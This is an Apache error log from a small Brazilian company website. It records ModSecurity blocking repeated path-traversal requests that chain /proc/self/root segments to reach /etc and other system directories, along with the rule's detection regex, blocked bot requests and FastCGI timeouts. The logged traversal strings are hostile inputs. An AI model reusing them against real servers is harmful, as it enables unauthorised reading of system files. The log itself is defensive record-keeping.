[Tue Mar 17 14:16:58.436882 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.128:43206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMiqBJNF7axNlVR0UXlwAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:03.933801 2026] [proxy_fcgi:error] [pid 18380:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:45740] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:17:05.037299 2026] [:error] [pid 2598:tid 140411616036608] [client 74.7.243.128:52920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMkRj0p0SRWAqcjGF6PgAAAw8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:06.481528 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.243.128:52932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMkqBJNF7axNlVR0UXpQAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:08.110592 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:52944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMlNY0UrI5A3LftIz8dwAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:09.575530 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:37452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMldY0UrI5A3LftIz8ewAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:10.971532 2026] [:error] [pid 29151:tid 140411733534464] [client 74.7.243.128:37466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMlvPqhzTj3BvfDX-IjwAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:12.481905 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.243.128:37474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMmBj0p0SRWAqcjGF6QgAAAwk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:14.051578 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.243.128:37480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMmtCmCSWTlPouqork-AAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:15.583074 2026] [:error] [pid 17965:tid 140411607643904] [client 74.7.243.128:37488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMm6t8Nd0UC_OcbVHLpgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:16.999036 2026] [:error] [pid 29359:tid 140411540502272] [client 74.7.243.128:37496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMnKSy22zYCMGxsIldNAAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:18.435899 2026] [:error] [pid 29151:tid 140411699963648] [client 74.7.243.128:37498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMnvPqhzTj3BvfDX-ImQAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:19.851674 2026] [:error] [pid 30223:tid 140411649607424] [client 74.7.243.128:44112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMn8T4LuLykoMK_89piAAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:25.977651 2026] [:error] [pid 29359:tid 140411557287680] [client 74.7.243.128:44124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMpaSy22zYCMGxsIldNwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:17:27.129914 2026] [proxy_fcgi:error] [pid 30223:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46146] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:17:30.314809 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.243.128:44130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMqr-sgTmmJoPuMdy3CgAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:17:32.008650 2026] [:error] [pid 2598:tid 140411624429312] [client 74.7.243.128:35294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMrBj0p0SRWAqcjGF6SwAAAw4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:17:49.125816 2026] [proxy_fcgi:error] [pid 28243:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46620] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:18:10.373834 2026] [proxy_fcgi:error] [pid 17965:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47012] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:18:12.767081 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.228.61:58816] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmM1Kt8Nd0UC_OcbVHLtQAAAIc"]
[Tue Mar 17 14:18:13.415181 2026] [:error] [pid 29359:tid 140411607643904] [client 74.7.244.43:41360] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmM1aSy22zYCMGxsIldPwAAAlA"]
[Tue Mar 17 14:18:33.127103 2026] [proxy_fcgi:error] [pid 17965:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47568] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:18:41.269707 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.31:44522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmM8aBJNF7axNlVR0UX6QAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:18:55.128434 2026] [proxy_fcgi:error] [pid 18380:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48018] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:19:17.101842 2026] [proxy_fcgi:error] [pid 30223:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:48618] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:19:40.085815 2026] [proxy_fcgi:error] [pid 7437:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49294] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:19:44.635662 2026] [mime_magic:error] [pid 19507:tid 140411616036608] (70014)End of file found: [client 74.7.241.31:59174] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/spool/postfix
[Tue Mar 17 14:20:03.070138 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50126] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:20:07.877795 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:49774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNRtY0UrI5A3LftIz9AAAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:20:29.121894 2026] [proxy_fcgi:error] [pid 11293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50856] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:20:36.287935 2026] [:error] [pid 6296:tid 140411699963648] [client 74.7.241.31:34540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNZHIk7brgkOH-rIWMtwAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:20:51.129825 2026] [proxy_fcgi:error] [pid 30223:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51382] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:20:56.715736 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:34428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmNePPqhzTj3BvfDX-I6wAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:21:13.121936 2026] [proxy_fcgi:error] [pid 18380:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51948] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:21:35.133894 2026] [proxy_fcgi:error] [pid 2598:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52556] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:21:57.138988 2026] [proxy_fcgi:error] [pid 29151:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53164] AH01075: Error dispatching request to : (polling)
